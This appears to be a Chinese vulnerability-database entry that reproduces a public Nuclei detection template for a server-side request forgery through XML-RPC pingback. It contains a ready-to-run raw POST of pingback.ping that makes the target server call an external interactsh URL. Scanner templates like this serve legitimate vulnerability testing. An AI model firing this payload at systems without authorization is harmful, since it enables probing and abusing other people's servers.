漏洞描述
XMLRPC Pingback leads to SSRF.
xmlrpc-pingback-ssrf: XMLRPC Pingback SSRF
PoC代码[已公开]
id: xmlrpc-pingback-ssrf
info:
name: XMLRPC Pingback SSRF
author: geeknik
severity: high
description: XMLRPC Pingback leads to SSRF.
reference:
- https://hackerone.com/reports/406387
metadata:
max-request: 1
tags: xmlrpc,hackerone,ssrf,generic,vuln
http:
- raw:
- |
POST /xmlrpc/pingback HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>http://{{interactsh-url}}</value>
</param>
</params>
</methodCall>
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 490a0046304402200d8a93c4079517be68668f1d73c1a2c187451b8e4b2b104f91b74afd5c2ace2f02203166baebbacd037f078febc1f069cc2d0308b732f94bd6cf90ca5a931c52e7db:922c64590222798bb761d5b6d8e72950